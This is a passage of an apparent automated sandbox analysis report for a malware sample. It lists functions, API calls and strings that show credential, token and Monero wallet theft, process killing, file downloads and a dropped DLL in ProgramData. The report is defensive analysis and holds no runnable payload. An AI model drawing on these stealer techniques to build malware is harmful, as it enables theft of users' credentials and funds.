                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                        • String ID: Password
                                        • API String ID: 2808661185-3434357891
                                        • Opcode ID: 56a3766749b2961755f463f8e3907b53570470504a029fb487b3b10b92465051
                                        • Instruction ID: ce916ac5eba92ecc86f4171a778f127be3249c718a1f33edfafb868ba97877b7
                                        • Opcode Fuzzy Hash: 56a3766749b2961755f463f8e3907b53570470504a029fb487b3b10b92465051
                                        • Instruction Fuzzy Hash: D5612EB59042589BDB24EB50DC45BDAB7B8BF54300F5081E9E649A6181DF709BC9CF90
                                        Function 00189E30 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 163stringsleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00198CF0: GetSystemTime.KERNEL32(001A0E1B,011CA750,001A05B6,?,?,001813F9,?,0000001A,001A0E1B,00000000,?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 00198D16
                                        • wsprintfA.USER32 ref: 00189E7F
                                        • memset.MSVCRT ref: 00189EED
                                        • lstrcat.KERNEL32(00000000,?), ref: 00189F03
                                        • lstrcat.KERNEL32(00000000,?), ref: 00189F17
                                        • lstrcat.KERNEL32(00000000,001A12D8), ref: 00189F29
                                        • lstrcpy.KERNEL32(?,00000000), ref: 00189F7C
                                        • memset.MSVCRT ref: 00189F9C
                                        • Sleep.KERNEL32(00001388), ref: 0018A013
                                          • Part of subcall function 001999A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001999C5
                                          • Part of subcall function 001999A0: Process32First.KERNEL32(0018A056,00000128), ref: 001999D9
                                          • Part of subcall function 001999A0: Process32Next.KERNEL32(0018A056,00000128), ref: 001999F2
                                          • Part of subcall function 001999A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00199A4E
                                          • Part of subcall function 001999A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00199A6C
                                          • Part of subcall function 001999A0: CloseHandle.KERNEL32(00000000), ref: 00199A79
                                          • Part of subcall function 001999A0: CloseHandle.KERNEL32(0018A056), ref: 00199A88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                        • String ID: D
                                        • API String ID: 3242155833-2746444292
                                        • Opcode ID: 96d4916bccd36bdb4a9dc2c2c6b59929bc59767fee0a35f21c8701a1507ee9f0
                                        • Instruction ID: 2e58271f52ecb80d18f89d35b9b629b3d02aae06aa7f584412d44134071f04b1
                                        • Opcode Fuzzy Hash: 96d4916bccd36bdb4a9dc2c2c6b59929bc59767fee0a35f21c8701a1507ee9f0
                                        • Instruction Fuzzy Hash: 7D5188B1944318ABEB20EB60DC4AFDE7378AF54700F004598F60DA7281EB75AB88CF55
                                        Function 001860F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 00184800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
                                          • Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899
                                        • InternetOpenA.WININET(001A0DFB,00000001,00000000,00000000,00000000), ref: 0018615F
                                        • StrCmpCA.SHLWAPI(?,011CE938), ref: 00186197
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 001861DF
                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00186203
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 0018622C
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0018625A
                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00186299
                                        • InternetCloseHandle.WININET(?), ref: 001862A3
                                        • InternetCloseHandle.WININET(00000000), ref: 001862B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2507841554-0
                                        • Opcode ID: 466b40b5338549acbbaadd5f0e1602cc0e1ba888426aade90c65fb68cd1f1a08
                                        • Instruction ID: 8142d1d28414f3b12e48dc0e048f3c4e7ad972e810485221ec9a796c1ccc2657
                                        • Opcode Fuzzy Hash: 466b40b5338549acbbaadd5f0e1602cc0e1ba888426aade90c65fb68cd1f1a08
                                        • Instruction Fuzzy Hash: A35142B1A00218ABDF24EFA0DC45BEE7779AF44301F5085A8F605A71C1DB74AB89CF95
                                        Function 0020012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • type_info::operator==.LIBVCRUNTIME ref: 0020024D
                                        • ___TypeMatch.LIBVCRUNTIME ref: 0020035B
                                        • CatchIt.LIBVCRUNTIME ref: 002003AC
                                        • CallUnexpected.LIBVCRUNTIME ref: 002004C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 2356445960-393685449
                                        • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction ID: a29b41aead1339f8164d86a37ebf2e55ca8fbba4d248f467551b756bcf2780d7
                                        • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction Fuzzy Hash: A5B1683181030AEFEF15DFA4D8C1AAEBBB5BF14314F10416AE9156B293D370DA61CB91
                                        Function 0018BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                        • lstrlen.KERNEL32(00000000), ref: 0018BC6F
                                          • Part of subcall function 00198FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00198FE2
                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0018BC9D
                                        • lstrlen.KERNEL32(00000000), ref: 0018BD75
                                        • lstrlen.KERNEL32(00000000), ref: 0018BD89
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                        • API String ID: 3073930149-1079375795
                                        • Opcode ID: 0adebf598ff95b9b07b2f799cfa11561ea26c1ec6f8115336991e040e38549b3
                                        • Instruction ID: 8846ed142b565d20cb52d7c3acdc0e81dfe06dd6ee52c6d8251061c0a22e9234
                                        • Opcode Fuzzy Hash: 0adebf598ff95b9b07b2f799cfa11561ea26c1ec6f8115336991e040e38549b3
                                        • Instruction Fuzzy Hash: 52B1F072914108ABCF14FBA0DD96EEE7379BF64301F804568F50766192EF346A4CCBA6
                                        Function 00196A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess$DefaultLangUser
                                        • String ID: *
                                        • API String ID: 1494266314-163128923
                                        • Opcode ID: 250e78e0bd15c867cb7380f87ff1ce003a2d165a790cacbb29c6c6e179262f6a
                                        • Instruction ID: 38825ea680982a2fc2ca820c9f07a4b99a1ce9f88575ac9da1d31abcb2ec18f0
                                        • Opcode Fuzzy Hash: 250e78e0bd15c867cb7380f87ff1ce003a2d165a790cacbb29c6c6e179262f6a
                                        • Instruction Fuzzy Hash: EBF0F83194C309EFD744AFE0F90979CBB70EB04707F1141B9F61A96291CA749A909B79
                                        Function 001908A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 00199850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,001908DC,C:\ProgramData\chrome.dll), ref: 00199871
                                          • Part of subcall function 0018A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0018A098
                                        • StrCmpCA.SHLWAPI(00000000,011C9248), ref: 00190922
                                        • StrCmpCA.SHLWAPI(00000000,011C92B8), ref: 00190B79
                                        • StrCmpCA.SHLWAPI(00000000,011C9228), ref: 00190A0C
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                        • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00190C35
                                        Strings
                                        • C:\ProgramData\chrome.dll, xrefs: 00190C30
                                        • C:\ProgramData\chrome.dll, xrefs: 001908CD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                        • API String ID: 585553867-663540502
                                        • Opcode ID: 5502556bf34e5e885e8ef4dd9e9bfe8ab00d69111cf39cac849f6e4b53f196ad
                                        • Instruction ID: 0fe21a42d3d7d0a166248f152b27c77417f6bb79e4e5a51cebb059f840cc2e87
                                        • Opcode Fuzzy Hash: 5502556bf34e5e885e8ef4dd9e9bfe8ab00d69111cf39cac849f6e4b53f196ad
                                        • Instruction Fuzzy Hash: 48A114717002089FCF18FF64D996AAD77BAAF95300F50856DE40A9F252DB30DA09CBD6
                                        Function 001FF9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                        Download Yara Rule
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 001FFA1F
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 001FFA27
                                        • _ValidateLocalCookies.LIBCMT ref: 001FFAB0
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 001FFADB
                                        • _ValidateLocalCookies.LIBCMT ref: 001FFB30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction ID: 8d2535d833ac8d2689adbd6f5a4575e024391b320c1321b69a088a43be1024bb
                                        • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction Fuzzy Hash: 1F41B43590021DEBCF10DF68C880AAE7BB5FF49314F148169EA19AB392D7719916CF91
                                        Function 00185000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0018501A
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00185021
                                        • InternetOpenA.WININET(001A0DE3,00000000,00000000,00000000,00000000), ref: 0018503A
                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00185061
                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00185091
                                        • InternetCloseHandle.WININET(?), ref: 00185109
                                        • InternetCloseHandle.WININET(?), ref: 00185116
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                        • String ID:
                                        • API String ID: 3066467675-0
                                        • Opcode ID: 9a55e9a3635213b5c14e6e53e5b1a4e0203446e3341fca9f37918fe23842eac3
                                        • Instruction ID: 7bfde2d18428e85f56315a63b9bfa1328e3fba1a31c987dcce368aa084e21449
                                        • Opcode Fuzzy Hash: 9a55e9a3635213b5c14e6e53e5b1a4e0203446e3341fca9f37918fe23842eac3
                                        • Instruction Fuzzy Hash: 233118B4A04218ABDB24DF54DC85BDCB7B5EB48305F5081E8FA09A7281CB706EC58F98
                                        Function 00198290 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,011CE0F8,00000000,?,001A0E14,00000000,?,00000000), ref: 001982C0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 001982C7
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 001982E8
                                        • wsprintfA.USER32 ref: 0019833C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
